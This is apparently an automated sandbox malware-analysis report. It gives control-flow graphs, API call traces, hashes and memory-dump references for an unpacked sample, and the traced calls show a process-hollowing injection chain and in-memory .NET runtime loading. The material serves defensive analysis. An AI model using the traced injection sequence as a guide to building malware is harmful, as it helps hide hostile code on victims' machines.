                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: bf1b73703b48d4d868b94fe729d1aa4cf52d90d402cd1fea60ff07b1179cd2da
                                            • Instruction ID: 50e053fe01afda9a781bf126050a712b66a69503156945943063751f1883ce08
                                            • Opcode Fuzzy Hash: bf1b73703b48d4d868b94fe729d1aa4cf52d90d402cd1fea60ff07b1179cd2da
                                            • Instruction Fuzzy Hash: 76416A72900209AFCF16DF94CD81AEEBBB5FF4A300F148159FA14672A1D7399A51DB50

                                            Execution Graph

                                            Execution Coverage:50.9%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:39
                                            Total number of Limit Nodes:1
                                            execution_graph 391 431b010 392 431b049 391->392 393 431b0e1 392->393 401 4319850 392->401 397 431b115 419 4319fb0 397->419 399 431b1a7 422 431a4f0 NtAllocateVirtualMemory 399->422 402 4319875 401->402 403 4319fb0 VirtualAlloc 402->403 405 431990f 403->405 404 4319921 404->397 413 4319b10 404->413 405->404 406 4319989 NtCreateFile 405->406 407 4319a2b 406->407 412 4319a34 406->412 408 4319a36 CreateFileMappingA 407->408 407->412 409 4319a94 MapViewOfFile 408->409 411 4319a64 408->411 409->412 410 4319abc FindCloseChangeNotification 410->404 411->409 411->412 412->404 412->410 415 4319b5e 413->415 414 4319b77 414->397 415->414 416 4319c2d NtProtectVirtualMemory 415->416 431 431a150 416->431 420 4319ff1 419->420 421 431a024 VirtualAlloc 420->421 421->399 423 431a580 422->423 424 431a6f7 GetTempFileNameA 423->424 433 4319c90 424->433 426 431a71b CreateFileA WriteFile 427 431a780 CreateProcessA NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory 426->427 428 431a82a 427->428 429 431a88e Wow64GetThreadContext Wow64SetThreadContext ResumeThread ExitProcess 428->429 430 431a851 WriteProcessMemory 428->430 429->393 430->428 432 4319c5c NtProtectVirtualMemory 431->432 432->414 435 4319c95 433->435 436 431a0d0 437 4319fb0 VirtualAlloc 436->437 438 431a0dd 437->438

                                            Callgraph

                                            Control-flow Graph

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0431A561
                                            • GetTempFileNameA.KERNELBASE(?,kate,00000000,?), ref: 0431A714
                                            • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 0431A742
                                            • WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 0431A76C
                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 0431A7B6
                                            • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 0431A7D0
                                            • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 0431A7FB
                                            • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 0431A81F
                                            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0431A881
                                            • Wow64GetThreadContext.KERNEL32(?,00010002), ref: 0431A8AF
                                            • Wow64SetThreadContext.KERNEL32(?,00010002), ref: 0431A8DA
                                            • ResumeThread.KERNELBASE(?), ref: 0431A8EC
                                            • ExitProcess.KERNEL32(00000000), ref: 0431A8F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2320846713.0000000004319000.00000040.00001000.00020000.00000000.sdmp, Offset: 04319000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_4319000_zfQlIB6J8n2u_zLV5LHnA1xW.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$FileMemoryThreadWrite$ContextCreateVirtualWow64$AllocAllocateExitNameResumeSectionTempUnmapView
                                            • String ID: kate
                                            • API String ID: 1984375786-4076676908
                                            • Opcode ID: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                            • Instruction ID: fc7c60005b59eec010b795ecf79585603446adfeb860ee8f5995db3156d6f0d4
                                            • Opcode Fuzzy Hash: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                            • Instruction Fuzzy Hash: 42E1CB75A00208AFDB58CF84D895FEEB7B5BF88314F108199E508AB391D771AE85CF94

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 04319FB0: VirtualAlloc.KERNELBASE(00000000,0431990F,00003000,00000040), ref: 0431A034
                                            • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 04319A1B
                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04319ACC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2320846713.0000000004319000.00000040.00001000.00020000.00000000.sdmp, Offset: 04319000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_4319000_zfQlIB6J8n2u_zLV5LHnA1xW.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocChangeCloseCreateFileFindNotificationVirtual
                                            • String ID: @
                                            • API String ID: 482251274-2766056989
                                            • Opcode ID: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                            • Instruction ID: 15d262e2fc520602a19ae89196cd82de0df18fe93c5006a02e56fe1ab2018e5d
                                            • Opcode Fuzzy Hash: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                            • Instruction Fuzzy Hash: 8E81EE75A00218EFDB24DF54DC55FDAB3B5AF48710F1481E9EA09AB290D7706A84CF94

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 59 4319b10-4319b75 call 4319740 62 4319b77-4319b79 59->62 63 4319b7e-4319b93 59->63 64 4319c81-4319c84 62->64 65 4319b95-4319b97 63->65 66 4319b9c-4319bb4 63->66 65->64 67 4319bbf-4319bc9 66->67 68 4319c17-4319c1b 67->68 69 4319bcb-4319bdb 67->69 72 4319c29-4319c2b 68->72 73 4319c1d-4319c21 68->73 70 4319c15 69->70 71 4319bdd-4319c13 69->71 70->67 71->68 72->64 73->72 75 4319c23-4319c27 73->75 75->72 76 4319c2d-4319c7c NtProtectVirtualMemory call 431a150 NtProtectVirtualMemory 75->76 76->64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2320846713.0000000004319000.00000040.00001000.00020000.00000000.sdmp, Offset: 04319000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_4319000_zfQlIB6J8n2u_zLV5LHnA1xW.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .tex
                                            • API String ID: 0-1946526065
                                            • Opcode ID: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                            • Instruction ID: da946724bc06580770e1f35d1de137d3baf394b0e73966a42fbb0ab673c15c77
                                            • Opcode Fuzzy Hash: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                            • Instruction Fuzzy Hash: C151D7B1E00109DFDB08CF84C8A4BEEFBB5FF48314F149599D915AB290D775AA85CBA0

                                            Control-flow Graph

                                            APIs
                                            • VirtualAlloc.KERNELBASE(00000000,0431990F,00003000,00000040), ref: 0431A034
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2320846713.0000000004319000.00000040.00001000.00020000.00000000.sdmp, Offset: 04319000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_4319000_zfQlIB6J8n2u_zLV5LHnA1xW.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: VirtualAlloc
                                            • API String ID: 4275171209-164498762
                                            • Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                            • Instruction ID: 0052a6ea57e9c2370442911aa8ffab93c048b4484e2596465d925a6c626a577d
                                            • Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                            • Instruction Fuzzy Hash: A711E2A0D082C9DEFF01DBE898097EFBFB55F12709F044098D5446B282D6BA5758C7B6

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 6896b6b0-6896b758 VariantInit * 2 1 6896b764-6896b769 0->1 2 6896b75a-6896b75f call 689bc1e0 0->2 4 6896b773-6896b784 1->4 5 6896b76b-6896b770 1->5 2->1 7 6896be96-6896beb4 VariantClear * 2 4->7 8 6896b78a-6896b791 4->8 5->4 9 6896beb6-6896bebb 7->9 10 6896bebe-6896beca 7->10 11 6896b793-6896b798 8->11 12 6896b7b9-6896b7e2 SafeArrayCreateVector 8->12 9->10 13 6896bed4-6896bef2 call 689a948b 10->13 14 6896becc-6896bed1 10->14 15 6896b7a2-6896b7b3 11->15 16 6896b79a-6896b79f 11->16 17 6896b7e4-6896b7e7 12->17 18 6896b7ec-6896b809 SafeArrayPutElement VariantClear 12->18 14->13 15->7 15->12 16->15 17->18 20 6896be85-6896be8d 18->20 21 6896b80f-6896b81d 18->21 20->7 24 6896be8f-6896be90 SafeArrayDestroy 20->24 25 6896b81f-6896b824 call 689bc1e0 21->25 26 6896b829-6896b841 21->26 24->7 25->26 26->20 29 6896b847-6896b853 26->29 29->20 30 6896b859-6896b85e 29->30 30->20 31 6896b864-6896b86b 30->31 32 6896b913-6896b917 31->32 33 6896b871-6896b87e 31->33 34 6896b921-6896b941 call 6895dcd0 32->34 35 6896b919-6896b91b 32->35 36 6896b880-6896b882 33->36 37 6896b888-6896b8f8 call 6896dbc0 call 68965790 call 6896c850 33->37 34->20 42 6896b947-6896b964 call 6895dcd0 34->42 35->20 35->34 36->20 36->37 52 6896b904-6896b90e call 6896e800 37->52 53 6896b8fa-6896b8ff call 6896e800 37->53 42->20 48 6896b96a-6896b96d 42->48 50 6896b993-6896b9bf 48->50 51 6896b96f-6896b98d call 6895dcd0 48->51 55 6896b9c1-6896b9c6 call 689bc1e0 50->55 56 6896b9cb-6896ba1d VariantClear 50->56 51->20 51->50 52->50 63 6896be83 53->63 55->56 56->20 65 6896ba23-6896ba31 56->65 63->20 66 6896ba33-6896ba38 call 689bc1e0 65->66 67 6896ba3d-6896ba8b 65->67 66->67 67->20 70 6896ba91-6896ba95 67->70 70->20 71 6896ba9b-6896baa7 call 689a9bb5 70->71 74 6896bab6 71->74 75 6896baa9-6896bab4 71->75 76 6896bab8-6896bacc call 6896bf00 74->76 75->76 76->20 79 6896bad2-6896bada 76->79 80 6896baf3-6896baf8 79->80 81 6896badc-6896baed call 689647d0 79->81 83 6896bb11-6896bb2e call 689649b0 80->83 84 6896bafa-6896bb0b call 689647d0 80->84 81->20 81->80 83->20 90 6896bb34-6896bb4b call 6896cd20 83->90 84->20 84->83 90->20 93 6896bb51-6896bb8e call 68965790 call 68964170 90->93 98 6896bb90-6896bb95 call 6896e800 93->98 99 6896bb9a-6896bba8 call 6896e800 93->99 98->63 104 6896bca2 99->104 105 6896bbae-6896bbc0 99->105 107 6896bca8-6896bcae 104->107 105->104 106 6896bbc6-6896bc5b call 6895c4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6896db10 105->106 120 6896bc60-6896bc75 106->120 109 6896bcb4-6896bcc6 107->109 110 6896bd78-6896bdc8 107->110 109->110 112 6896bccc-6896bd76 call 6895c4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6896db10 VariantClear * 2 109->112 110->63 121 6896bdce-6896bdd7 110->121 112->110 123 6896bc77-6896bc8d 120->123 124 6896bc90-6896bca0 VariantClear * 2 120->124 121->63 125 6896bddd-6896bde4 121->125 123->124 124->107 125->63 127 6896bdea-6896be03 call 689a9bb5 125->127 130 6896be05-6896be10 call 6895c4a0 127->130 131 6896be12 127->131 132 6896be14-6896be3c 130->132 131->132 134 6896be3e-6896be50 132->134 135 6896be7f 132->135 134->135 137 6896be52-6896be65 call 689a9bb5 134->137 135->63 140 6896be67-6896be6f call 6895c4a0 137->140 141 6896be71 137->141 143 6896be73-6896be7c 140->143 141->143 143->135
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6896B73F
                                            • VariantInit.OLEAUT32(?), ref: 6896B748
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6896B7BE
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6896B7F5
                                            • VariantClear.OLEAUT32(?), ref: 6896B801
                                              • Part of subcall function 6896C850: VariantInit.OLEAUT32(?), ref: 6896C88F
                                              • Part of subcall function 6896C850: VariantInit.OLEAUT32(?), ref: 6896C895
                                              • Part of subcall function 6896C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6896C8A0
                                              • Part of subcall function 6896C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6896C8D5
                                              • Part of subcall function 6896C850: VariantClear.OLEAUT32(?), ref: 6896C8E1
                                            • VariantClear.OLEAUT32(?), ref: 6896BA15
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896BE90
                                            • VariantClear.OLEAUT32(?), ref: 6896BEA3
                                            • VariantClear.OLEAUT32(?), ref: 6896BEA9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                            • String ID: Aj?Q$Aj?Q
                                            • API String ID: 2012514194-3777561156
                                            • Opcode ID: 4d91094a7bf1cb4bc26aec877ece08de3414f88caced6ff3e6e137900b042f89
                                            • Instruction ID: 77b4b26c6bf5e230d32792c32d070294e5c136269839b5d25e24493d2a83642c
                                            • Opcode Fuzzy Hash: 4d91094a7bf1cb4bc26aec877ece08de3414f88caced6ff3e6e137900b042f89
                                            • Instruction Fuzzy Hash: 52525975900218DFDB11DFA8C884BEEBBB9BF99314F548199E519AB340DB30E985CF90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 865 5bc0eb3-5bc0ece 867 5bc19bb-5bc19bf 865->867 868 5bc0ed4-5bc0ee6 865->868 869 5bc19c1-5bc19cd 867->869 870 5bc19d2-5bc1a58 867->870 874 5bc0ee8-5bc0f0a 868->874 875 5bc0f15-5bc0f36 868->875 871 5bc1ee8-5bc1ef5 869->871 887 5bc1a5a-5bc1a66 870->887 888 5bc1a82 870->888 874->875 879 5bc0f3c-5bc0f52 874->879 875->879 880 5bc0f5e-5bc1042 879->880 881 5bc0f54-5bc0f58 879->881 902 5bc106c 880->902 903 5bc1044-5bc1050 880->903 881->867 881->880 891 5bc1a68-5bc1a6e 887->891 892 5bc1a70-5bc1a76 887->892 889 5bc1a88-5bc1aaf 888->889 894 5bc1aba-5bc1acd 889->894 893 5bc1a80 891->893 892->893 893->889 897 5bc1ad2-5bc1adf 894->897 898 5bc1ae5-5bc1b0e 897->898 899 5bc1ae1 897->899 904 5bc1b14-5bc1b40 898->904 905 5bc1c40-5bc1c47 898->905 899->898 906 5bc1072-5bc1124 902->906 907 5bc105a-5bc1060 903->907 908 5bc1052-5bc1058 903->908 916 5bc1b47-5bc1b82 904->916 917 5bc1b42 904->917 909 5bc1c4d-5bc1d4c 905->909 910 5bc1d4f-5bc1db0 905->910 929 5bc114e 906->929 930 5bc1126-5bc1132 906->930 911 5bc106a 907->911 908->911 909->910 910->871 911->906 916->905 917->916 934 5bc1154-5bc116f 929->934 932 5bc113c-5bc1142 930->932 933 5bc1134-5bc113a 930->933 935 5bc114c 932->935 933->935 938 5bc1199 934->938 939 5bc1171-5bc117d 934->939 935->934 943 5bc119f-5bc11bd 938->943 941 5bc117f-5bc1185 939->941 942 5bc1187-5bc118d 939->942 945 5bc1197 941->945 942->945 948 5bc12db-5bc13bf 943->948 949 5bc11c3-5bc12c3 943->949 945->943 962 5bc13e9 948->962 963 5bc13c1-5bc13cd 948->963 949->948 964 5bc13ef-5bc1444 962->964 966 5bc13cf-5bc13d5 963->966 967 5bc13d7-5bc13dd 963->967 975 5bc144a-5bc1549 964->975 976 5bc1562-5bc1638 964->976 968 5bc13e7 966->968 967->968 968->964 975->976 976->867 985 5bc163e-5bc1647 976->985 987 5bc1649-5bc164c 985->987 988 5bc1652-5bc1751 985->988 987->988 989 5bc176a-5bc1781 987->989 988->989 989->867 995 5bc1787-5bc1898 989->995 1011 5bc189a-5bc189d 995->1011 1012 5bc18a3-5bc19a2 995->1012 1011->867 1011->1012 1012->867
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2658558268.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5bc0000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<]q$p<]q$p<]q$p<]q$Guq$Guq$Guq$Guq$Guq
                                            • API String ID: 0-3029792773
                                            • Opcode ID: ff23e91abdc00a22fd8aa3b92053f32c6944f3bdfcb6a001e4428e0e907a3c73
                                            • Instruction ID: a10cdb900894a0e129f1041fc31d6d11ddc4ec935242353f51bcd0a7cba218eb
                                            • Opcode Fuzzy Hash: ff23e91abdc00a22fd8aa3b92053f32c6944f3bdfcb6a001e4428e0e907a3c73
                                            • Instruction Fuzzy Hash: 2A829374E402298FDB64DF69C994B99BBB1BF88310F1481E9D40DAB365DB34AE81CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1441 6895b6c0-6895b715 GetModuleHandleW 1442 6895b717-6895b724 LoadLibraryW 1441->1442 1443 6895b72a-6895b738 GetProcAddress 1441->1443 1442->1443 1444 6895b94c-6895b954 1442->1444 1443->1444 1445 6895b73e-6895b750 1443->1445 1446 6895b956-6895b95b 1444->1446 1447 6895b95e-6895b96a 1444->1447 1445->1444 1452 6895b756-6895b771 1445->1452 1446->1447 1448 6895b974-6895b98f call 689a948b 1447->1448 1449 6895b96c-6895b971 1447->1449 1449->1448 1452->1444 1455 6895b777-6895b788 1452->1455 1455->1444 1457 6895b78e-6895b791 1455->1457 1457->1444 1458 6895b797-6895b7b2 1457->1458 1458->1444 1460 6895b7b8-6895b7c5 1458->1460 1460->1444 1462 6895b7cb-6895b7d0 1460->1462 1463 6895b7d2-6895b7d7 1462->1463 1464 6895b7da-6895b7e7 1462->1464 1463->1464 1465 6895b7ec-6895b7ee 1464->1465 1465->1444 1466 6895b7f4-6895b7f9 1465->1466 1467 6895b805-6895b80a 1466->1467 1468 6895b7fb-6895b800 call 689bc1e0 1466->1468 1470 6895b814-6895b829 1467->1470 1471 6895b80c-6895b811 1467->1471 1468->1467 1470->1444 1473 6895b82f-6895b849 1470->1473 1471->1470 1474 6895b850-6895b85b 1473->1474 1474->1474 1475 6895b85d-6895b8a4 call 689aa116 GetModuleHandleW 1474->1475 1475->1444 1478 6895b8aa-6895b8c1 1475->1478 1479 6895b8c5-6895b8d0 1478->1479 1479->1479 1480 6895b8d2-6895b8f0 GetProcAddress 1479->1480 1480->1444 1481 6895b8f2-6895b8ff call 68945340 1480->1481 1485 6895b900-6895b905 1481->1485 1485->1485 1486 6895b907-6895b90d 1485->1486 1486->1485 1487 6895b90f-6895b912 1486->1487 1488 6895b914-6895b929 1487->1488 1489 6895b93a 1487->1489 1490 6895b931-6895b938 1488->1490 1491 6895b92b-6895b92e 1488->1491 1492 6895b93d-6895b948 call 6895ad80 1489->1492 1490->1492 1491->1490 1492->1444
                                            APIs
                                            • GetModuleHandleW.KERNEL32(mscoree.dll,513F6A41), ref: 6895B711
                                            • LoadLibraryW.KERNEL32(mscoree.dll), ref: 6895B71C
                                            • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6895B730
                                            • __cftoe.LIBCMT ref: 6895B870
                                            • GetModuleHandleW.KERNEL32(?), ref: 6895B88B
                                            • GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6895B8D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc$LibraryLoad__cftoe
                                            • String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
                                            • API String ID: 1275574042-506955582
                                            • Opcode ID: 4d89992c234543e85b0a8cf62f791d62df0c59ab8ae3ddc2e7025dd2958153cc
                                            • Instruction ID: 2029aa17cb692b38da76665a7d2a1474761d01e228d0eaa3a1b92552d14a6359
                                            • Opcode Fuzzy Hash: 4d89992c234543e85b0a8cf62f791d62df0c59ab8ae3ddc2e7025dd2958153cc
                                            • Instruction Fuzzy Hash: 6A918D71D042499FCB04DFE8C8949AEBBB4FF59314F90866CE12AEB240D730E906CB95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o]q$(o]q$,aq$,aq$Haq
                                            • API String ID: 0-2157538030
                                            • Opcode ID: dbc1251680b72636144bde1cce1d28af4e1509baebd260aa50bab3f95d40410d
                                            • Instruction ID: 616895a5f804253b98d3f660cecf96f07bb52d5392c79f3d44ee2a3fdb6de748
                                            • Opcode Fuzzy Hash: dbc1251680b72636144bde1cce1d28af4e1509baebd260aa50bab3f95d40410d
                                            • Instruction Fuzzy Hash: AE627E34A00125DFCB18DF6DC984A6EB7B3BF88724B16856AE8059B365DF34EC45CB90
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2658558268.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5bc0000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c4a28dadb981f2ebf7bcd18f6741d06c11d77f3ae851181ee4921117bd528f7
                                            • Instruction ID: 2e06121318e296755b1c37322ff8b79e933bdb2f0d9b9735fd4d40c56c54ce83
                                            • Opcode Fuzzy Hash: 7c4a28dadb981f2ebf7bcd18f6741d06c11d77f3ae851181ee4921117bd528f7
                                            • Instruction Fuzzy Hash: BB32AF74E012288FDB64DFA9C990BEDBBB2BF89300F1081AAD549A7354DB345E81CF51
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e3586c462ee0b700b8995092312f41e102c61401b92bead682c4df5fb5bdffb3
                                            • Instruction ID: a97ab61c9e4a96b5848e97f842f96533aa18723e6d3866e5e0b8d3a6e968614c
                                            • Opcode Fuzzy Hash: e3586c462ee0b700b8995092312f41e102c61401b92bead682c4df5fb5bdffb3
                                            • Instruction Fuzzy Hash: CA127F74E01229CFDB64DF69C994B9DBBB2BF89304F1081AAD409AB365DB305E85CF50
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2658558268.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5bc0000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a51259607c591ea7dada6fcebb1f89a659b396f887d08380268734ec97284b19
                                            • Instruction ID: 72a1e8000734464c8cee1022ded6bdb63db935dc1102b54a58cf9b66804d0ee0
                                            • Opcode Fuzzy Hash: a51259607c591ea7dada6fcebb1f89a659b396f887d08380268734ec97284b19
                                            • Instruction Fuzzy Hash: 2591C574E012289FDB64DF69C890BDDBBF2BF89300F1085AAD509AB354DB305A85CF51
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 689684BF
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 689684D2
                                            • SafeArrayGetElement.OLEAUT32 ref: 6896850A
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 689694C1
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 689694D4
                                            • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6896950C
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 689697A4
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 689697B7
                                            • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 689697F2
                                              • Part of subcall function 68963A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 68963B71
                                              • Part of subcall function 68963A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68963B83
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 68969D5F
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68969D72
                                            • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 68969DAF
                                              • Part of subcall function 68963A90: SafeArrayDestroy.OLEAUT32(?), ref: 68963BCF
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6896A1BC
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6896A1CF
                                            • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6896A20C
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
